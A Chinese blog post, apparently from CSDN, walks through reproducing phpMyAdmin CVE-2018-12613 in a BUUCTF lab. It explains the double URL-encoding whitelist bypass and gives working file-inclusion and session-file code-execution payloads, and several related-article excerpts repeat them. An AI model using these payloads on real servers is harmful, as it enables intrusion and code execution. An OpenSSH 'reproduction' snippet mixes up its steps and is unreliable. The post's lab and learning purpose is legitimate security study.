【漏洞复现】CVE-2018-12613 phpMyAdmin文件包含getshell

最新推荐文章于 2023-03-29 14:34:46 发布
最新推荐文章于 2023-03-29 14:34:46 发布
阅读量434 收藏 2
点赞数
分类专栏: 漏洞复现 文章标签: php 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Mr_atopos/article/details/124913899
版权

该漏洞影响phpMyAdmin 4.8.0-4.8.1版本

checkPageValidity函数对数据的处理逻辑不够严密,利用二次url编码绕过文件包含检测

payload
通过查询在session中添加php语句,再通过文件包含执行

?target=db_sql.php%253f/…/…/…/…/…/…/…/…/(要包含的文件)

target有白名单检测机制,db_sql.php在白名单中
通过?的二次编码成%253f
target在检测白名单的时候,会对db_sql.php%253f进行二次url解码,解码成db_sql.php?,因为是GET传参因此会省略?后面部分的内容,这时db_sql.php?可以通过白名单限制

但在进行文件包含时,只进行了一次url解码,解码成db_sql.php%3f,此时%3f没有被解码,php会把它当成一个路径
然后再通过db_sql.php%3f/…/…/…/…/…/,进行目录跳转就可以一直回溯到根目录,然后可以包含任意文件

通过包含日志来利用

[BUU [PHPMYADMIN]CVE-2018-12613 ](https://buuoj.cn/challenges#[PHPMYADMIN]CVE-2018-12613)

打开是个phpMyAdmin界面

payload
通过查询在session中添加php语句,再通过文件包含执行

?target=db_sql.php%253f/…/…/…/…/…/…/…/…/tmp/(SESSION文件)

执行sql语句,会把sql语句执行的结果保存在session文件中

select “<?php phpinfo();?>”

再通过文件包含session文件,执行php phpinfo();

?target=db_sql.php%253f/…/…/…/…/…/…/…/…/tmp/(SESSION文件)

找到flag
在这里插入图片描述

ky0uma
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
OPENSSH漏洞(CVE-2020-15778 CVE-2018-15473、CVE-2018-15919)修补文件命令
03-31
通过升级openssh到OpenSSH8.4 修复openssh低版本的漏洞 openssh8.4需要的 openssl-1.1.1g, openssh-8.4p1,zlib-1.2.11
CVE-2018-12613 phpmyadmin文件包含getshell连载(三)
PANDA墨森的博客
06-24 633
这是phpmyadmin系列渗透思路的第三篇文章,前面一篇文章阐述了通过慢查询日志getshell,本文将通过文件包含漏洞展开讨论 原文链接:https://www.cnblogs.com/PANDA-Mosen/p/13164349.html #001 影响版本 Phpmyadmin 4.8.0/4.8.0.1/4.8.1 #002 漏洞验证利用 http://www.xxx.com/index.php?target=db_sql.php%253f/../../../../../../e.
URL编码特殊字符%2F,%2B,%3F,%25
zichen的博客
01-24 6137
https://blog.csdn.net/w892824196/article/details/108198197
phpmyadmin 4.8.1远程文件包含漏洞 CVE-2018-12613 漏洞复现
ADummy的博客
02-26 274
phpmyadmin 4.8.1远程文件包含漏洞CVE-2018-12613) by ADummy 0x00利用路线 ​ 首先要能登录数据库,然后测试文件包含 0x01漏洞介绍 这里需要满足如下5个条件便可以执行包含文件代码include $_REQUEST['target']; 1.$_REQUEST['target']不为空 2.$_REQUEST['target']是字符串 3.$_REQUEST['target']开头不是index 4.$_REQUEST['target']不在$target
PhpMyAdmin4.8.1文件包含漏洞分析及复现利用(CVE-2018-12613)
Zlirving_的博客
06-28 1030
漏洞原理 攻击者利用发现在服务器上包含(查看和潜在执行)文件的漏洞。该漏洞来自一部分代码,其中页面在phpMyAdmin中被重定向和加载,以及对白名单页面进行不正确的测试。 攻击者必须经过身份验证,但在这些情况下除外: $ cfg [‘AllowArbitraryServer’] = true:攻击者可以指定他/她已经控制的任何主机,并在phpMyAdmin上执行任意代码; $ cfg [‘ServerDefault’] = 0:这会绕过登录并在没有任何身份验证的情况下运行易受攻击的代码。 影响版本 php
buuctf web warmup详细题解
weixin_64160292的博客
03-31 3044
题目:warmup 题目来源:buuctf 分析过程: 1. 首先ctrl + u 查看源代码,我们发现有一个source.php文件 2. 我们打开source.php文件,是一段代码,这道题要我们代码审计。 3. 与source文件相似的hint.php文件我们也打开看一下,它说flag在ffffllllaaaagggg中。 正在上传… 4. 然后回来source.php看这段代码,通过上网查询关于php的函数的用法。然后审计代码得出,...
CVE-2018-12613[远程文件包含漏洞]复现
L1ni01
12-01 2449
CVE-2018-12613[远程文件包含漏洞]复现 0x00漏洞介绍 攻击者利用发现在服务器上包含(查看和潜在执行)文件的漏洞。该漏洞来自一部分代码,其中页面在phpMyAdmin中被重定向和加载,以及对白名单页面进行不正确的测试。 攻击者必须经过身份验证,但在这些情况下除外: $ cfg [‘AllowArbitraryServer’] = true:攻击者可以指定他/她已经控制的任何主机,并在phpMyAdmin上执行任意代码; $ cfg [‘ServerDefault’] = 0:这会绕过登录并
OpenSSH 用户名枚举漏洞CVE-2018-15473).zip
03-06
OpenSSH 7.7及之前版本中存在用户枚举漏洞,该漏洞源于程序会对有效的和无效的用户身份验证请求发出不同的响应。 学习笔记
CVE-2018-12613phpmyadmin 4.8.1 远程文件包含漏洞复现
weixin_45694388的博客
10-31 221
**环境:**http://62.234.56.138:8080/server_databases.php 官网下载phpmyadmin 4.8.1 源码:index.php文件中 函数含义: targer非空 targer是否位字符串 不能以index为开头,即过滤了index 值不能出现在blacklist内,即黑名单 Core类的checkPageValidity方法判断(菜鸡扣jio) 前两个不重要,第三个条件: 全局搜索: 说明过滤了 ‘import.php’, ‘export.p
07#墨者靶场-phpMyAdmin后台文件包含分析溯源
shy的博客
11-22 1389
墨者学习 By/shy014 地址:https://www.mozhe.cn/bug/detail/RDM4VFA0aHFWT25Na09mdmhqcklxdz09bW96aGUmozhe 1.在墨者学院找到...
CVE-2018-12613phpMyAdmin文件包含漏洞复现
顶峰
03-29 614
漏洞
BUUCTF[PHPMYADMIN]CVE-2018-12613
qq_62078839的博客
04-24 1921
打开所提供的网址 是个phpmyadmin界面 phpmyadmin的版本号为4.8.1 在phpmyadmin的版本号为4.8.1以及4.8.0的版本中有着包含(查看并可能执行)服务器上的文件的漏洞,详情可看这篇文章 phpMyAdmin 是一套开源的、基于Web的MySQL数据库管理工具。在 4.8.2 之前的 phpMyAdmin 4.8.x 中发现了一个问题,其中攻击者可以在服务器上包含文件。该漏洞来自 phpMyAdmin 中重定向和加载页面的部分代码,以及对白名单页面的不当测试..
buuctf [PHPMYADMIN]CVE-2018-12613
qq_1873822的博客
03-16 678
phpMyAdmin版本信息:4.8.1 这里漏洞技术细节(涉及代码段、原理等)我上个链接 https://blog.csdn.net/jiyongx/article/details/105240498 任意文件包含 payload /index.php?target=tbl_sql.php%253f/…/…/…/…/…/…/…/…/etc/passwd 写入shell 第一种姿势 1、写入shell,测试语句: SELECT ‘<?php phpinfo()?>’ index.php?ta.
CVECVE-2018-12613:windows 复现 phpMyAdmin 本地文件包含造成远程代码执行漏洞
边扯边淡
11-24 852
起序:在做 Web 题遇到的,复现一下。 一、靶场环境 VMware Workstation 15.5 Pro cn_windows_7_ultimate_with_sp1_x64_dvd_u_677408.iso phpStudy 2018 phpMyAdmin-4.8.1-all-languages 二、漏洞分析 1、本地文件包含 LFI(本地文件包含),是指当服务器开启 allow_url_include 选项时,就可以通过php的某些特性函数 include(),require()和inclu
phpMyAdmin另一种getshell姿势(CVE-2018-12613)
weixin_43263451的博客
04-17 2526
我知道phpmyadmin的getshell大概有日志写马和select into outfile两种姿势,最近又新学了一种getshell姿势,赶紧记录一下 思路大概就是我们执行的sql语句会被记录到你的session文件中去,那我们就可以写马到自己的session文件,然后利用远程文件包含漏洞(CVE-2018-12613),导致可以getshell 漏洞复现 环境: phpmyadmin4.8.1 php 7.2.5 登入后查询select “<?php phpinfo();?>”; [
CVE-2018-12613 Phpmyadmin文件包含漏洞
weixin_51339377的博客
03-17 519
phpMyAdmin文件包含漏洞 利用条件: phpMyAdmin 4.8.0-4.8.1版本 用户已经拥有登录进入phpmyadmin后台的账号和密码 phpmyadmin配置文件位置 WWW\phpMyAdmin4.8.0\libraries\config.default.php 以下情况下攻击者在phpmyadmin中被重定向和加载,以及对白名单页面进行不正确的测试不需要身份验证: $cfg['AllowArbitraryServer']=true #攻击者可以指定.
OpenSSH 安全漏洞(CVE-2018-15473)
最新发布
08-04
OpenSSH 安全漏洞(CVE-2018-15473)是一个影响OpenSSH版本小于7.7的漏洞。要复现这个漏洞,可以按照以下步骤进行操作: 1. 首先,需要搭建漏洞环境。可以使用vulhub提供的Docker镜像来搭建环境。具体的操作命令如下: ``` cd vulhub/openssh/CVE-2018-15473 docker-compose build docker-compose up -d ``` 2. 接下来,需要替换密钥文件。首先备份原有的密钥文件,可以使用以下命令进行备份: ``` cp -r /usr/local/openssh/etc /usr/local/openssh/etc.bak ``` 然后,将旧版SSH密钥文件替换为新的密钥文件,可以使用以下命令进行替换: ``` cp /etc/ssh/ssh_host_* /usr/local/openssh/etc ``` 3. 如果旧版本是通过源码安装的OpenSSH,建议备份整个openssh目录。可以使用以下命令进行备份: ``` mv /usr/local/openssh /usr/local/openssh.old ``` 这样就完成了OpenSSH安全漏洞(CVE-2018-15473)的复现。[1][2][3]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值